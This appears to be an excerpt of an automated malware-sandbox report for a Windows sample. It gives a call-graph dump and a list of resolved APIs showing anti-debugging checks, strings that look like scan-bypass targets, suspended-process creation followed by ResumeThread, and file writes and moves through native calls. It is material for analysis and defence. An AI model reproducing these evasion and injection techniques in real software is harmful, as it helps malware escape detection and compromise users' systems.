287ea4c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287da20 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864734 call 287e4c0 call 28657c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864500 * 13 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286494c call 28646a4 call 2867e34 1227->1230 1781 2882e7d-2882e7f 1230->1781 1661 2881911-2881988 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1539->1661 1662 28823a6-28823b3 1539->1662 1690 288198d-2881a1a call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e8ec 1661->1690 1662->1055 1662->1539 1690->1662 1724 2881a20-2881b13 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1690->1724 1780 2881b18-2881b3b CoInitialize call 286480c 1724->1780 1785 2881b40-2881b8a call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 1780->1785 1783 288301b-2883126 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1781->1783 1784 2882e85-2883016 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286494c call 28646a4 call 2867fc8 1781->1784 1870 2883128-288312b 1783->1870 1871 288312d-2883345 call 28649ac call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 1783->1871 1784->1783 1815 2881b8f-2881b96 call 287881c 1785->1815 1821 2881b9b-2881c12 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1815->1821 1863 2881c17-2881c22 call 2876d48 1821->1863 1869 2881c27-2881ca2 call 2872818 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 1863->1869 1911 2881ca7-2881cae call 287881c 1869->1911 1870->1871 2013 288334b-288378d call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867e10 1871->2013 2014 28850ac-28858fe call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e60c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867a80 call 287ea4c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e974 call 287e9e8 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 1871->2014 1917 2881cb3-2881d2a call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1911->1917 1948 2881d2f-2881d47 call 286e37c 1917->1948 1952 2881d4c-2881dba call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 1948->1952 1976 2881dbf-2881dc6 call 287881c 1952->1976 1980 2881dcb-2881e42 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 1976->1980 2008 2881e47-2881e53 call 286e37c 1980->2008 2012 2881e58-2881ec6 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 2008->2012 2048 2881ecb-2881ed2 call 287881c 2012->2048 2377 28837ea-2883e99 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 2864798 call 286494c call 2877b90 call 2878798 call 286480c call 286494c call 2864798 call 286494c call 2877b90 call 2878798 call 2878704 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867e10 2013->2377 2378 288378f-28837e5 call 287e5cc call 2864d8c call 2864734 call 2864d8c call 287df00 2013->2378 2659 28870ec-2887367 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 2014->2659 2660 2885904-2885949 call 286480c call 286494c call 28646a4 call 2867e10 2014->2660 2054 2881ed7-2881f4e call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 2048->2054 2096 2881f53-2881f64 call 286e37c 2054->2096 2102 2881f69-2881fe7 call 2871768 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 2096->2102 2144 2881fec-2881ff3 call 287881c 2102->2144 2150 2881ff8-2882063 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 2144->2150 2186 2882068-2882095 call 287881c CoUninitialize call 286480c 2150->2186 2198 288209a-2882184 call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 2186->2198 2279 288218b-2882190 2198->2279 2280 2882186-2882189 2198->2280 2279->1662 2283 2882196-28823a1 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287ef70 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 2279->2283 2280->2279 2283->1662 2905 2883e9b-2883edc call 2864d8c * 2 call 2864734 call 287df00 2377->2905 2906 2883ee1-28840a8 call 2878704 call 287e974 call 2864798 call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 2867e10 2377->2906 2378->2377 2879 2887e9c-288809b call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 2659->2879 2880 288736d-28879bf call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864798 call 286494c call 2878408 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286494c call 28646a4 call 287ac30 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28636a0 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 2659->2880 2660->2659 2688 288594f-2886065 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864d8c * 2 call 2864734 call 287df00 2660->2688 3578 288606a-2886269 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 2688->3578 3122 28880a1-2888274 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864798 call 286494c call 2864d20 call 2864d9c CreateProcessAsUserW 2879->3122 3123 2888f25-28890a8 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864898 2879->3123 3847 28879c1-28879c4 2880->3847 3848 28879c6-2887c88 call 2875a6c call 2864b78 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28649a4 call 2877dd0 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287af50 2880->3848 2905->2906 3145 28840aa-2884100 call 287e5cc call 2864d8c call 2864734 call 2864d8c call 287df00 2906->3145 3146 2884105-2884533 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 287e974 call 2864798 call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867e10 2906->3146 3396 28882f2-28883fd call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 3122->3396 3397 2888276-28882ed call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 3122->3397 3361 28890ae-28890bd call 2864898 3123->3361 3362 2889854-288ae59 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c * 16 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 2877b90 call 2878184 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c ExitProcess 3123->3362 3145->3146 3876 288457b-28849c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 2867e10 3146->3876 3877 2884535-2884576 call 2864d8c * 2 call 2864734 call 287df00 3146->3877 3361->3362 3375 28890c3-2889396 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e974 call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867e10 3361->3375 3879 288939c-2889649 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864d8c * 2 call 2864734 call 287df00 3375->3879 3880 288964e-288984f call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28649a4 call 2878ba8 3375->3880 3582 28883ff-2888402 3396->3582 3583 2888404-2888724 call 28649a4 call 287e0c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287cf9c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 3396->3583 3397->3396 3949 28864cd-2886bf0 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28636a0 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 2862f08 call 2867944 call 2864798 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2862f08 call 2867944 call 2864798 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 28636d0 3578->3949 3950 288626f-28864c8 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 2864d20 call 2864d8c call 2864734 call 287df00 3578->3950 3582->3583 4217 288873d-2888f20 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c ResumeThread call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c CloseHandle call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2877ecc call 2878798 * 6 CloseHandle call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 3583->4217 4218 2888726-2888738 call 287857c 3583->4218 3847->3848 4486 2887c8d-2887ca4 call 28636d0 3848->4486 4674 2884a21-2884c7a call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 286480c call 286494c call 28646a4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 2867e10 3876->4674 4675 28849c6-2884a1c call 287e5cc call 2864d8c call 2864734 call 2864d8c call 287df00 3876->4675 3877->3876 3879->3880 3880->3362 3950->3949 4217->3123 4218->4217 4957 2884c7c-2884cd2 call 287e5cc call 2864d8c call 2864734 call 2864d8c call 287df00 4674->4957 4958 2884cd7-28850a7 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2878704 call 286494c call 2878408 Sleep call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864d20 call 287de78 call 2864d20 call 287de78 call 286480c call 286494c * 2 MoveFileA call 286480c call 286494c * 2 MoveFileA call 286494c call 2864d20 call 287de78 call 286494c call 2864d20 call 287de78 call 286494c call 2864d20 call 287de78 4674->4958 4675->4674 4957->4958 4958->2014
                APIs
                • InetIsOffline.URL(00000000,00000000,0288B3D5,?,?,?,000002F7,00000000,00000000), ref: 0287F0E2
                  • Part of subcall function 0287881C: LoadLibraryA.KERNEL32(00000000,00000000,02878903), ref: 02878850
                  • Part of subcall function 0287881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02878903), ref: 02878860
                  • Part of subcall function 0287881C: GetProcAddress.KERNEL32(743E0000,00000000), ref: 02878879
                  • Part of subcall function 0287881C: FreeLibrary.KERNEL32(743E0000,00000000,028C2388,Function_000065D8,00000004,028C2398,028C2388,000186A3,00000040,028C239C,743E0000,00000000,00000000,00000000,00000000,02878903), ref: 028788E3
                  • Part of subcall function 0287EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0287F3CC,UacInitialize,028C237C,0288B40C,UacScan,028C237C,0288B40C,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanString), ref: 0287EFCE
                  • Part of subcall function 0287EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0287EFE0
                  • Part of subcall function 0287F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0287F034
                  • Part of subcall function 0287F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0287F046
                  • Part of subcall function 0287F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0287F05D
                  • Part of subcall function 02867E10: GetFileAttributesA.KERNEL32(00000000,?,0287FD00,ScanString,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanString,028C237C,0288B40C,UacScan,028C237C,0288B40C,UacInitialize), ref: 02867E1B
                  • Part of subcall function 0286C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029B68C8,?,02880032,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanBuffer,028C237C,0288B40C,OpenSession), ref: 0286C2FB
                  • Part of subcall function 0287DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287E0B4), ref: 0287E01F
                  • Part of subcall function 0287DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0287E0B4), ref: 0287E04F
                  • Part of subcall function 0287DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0287E064
                  • Part of subcall function 0287DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0287E090
                  • Part of subcall function 0287DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0287E099
                  • Part of subcall function 02867E34: GetFileAttributesA.KERNEL32(00000000,?,02882E7D,ScanString,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,Initialize), ref: 02867E3F
                  • Part of subcall function 02867FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0288301B,OpenSession,028C237C,0288B40C,ScanString,028C237C,0288B40C,Initialize,028C237C,0288B40C,ScanString,028C237C,0288B40C), ref: 02867FD5
                  • Part of subcall function 0287DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0287DFD2), ref: 0287DF3F
                  • Part of subcall function 0287DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0287DF79
                  • Part of subcall function 0287DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0287DFA6
                  • Part of subcall function 0287DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0287DFAF
                  • Part of subcall function 02878798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize,028C23A4,0287A774,UacScan), ref: 028787AC
                  • Part of subcall function 02878798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028787C6
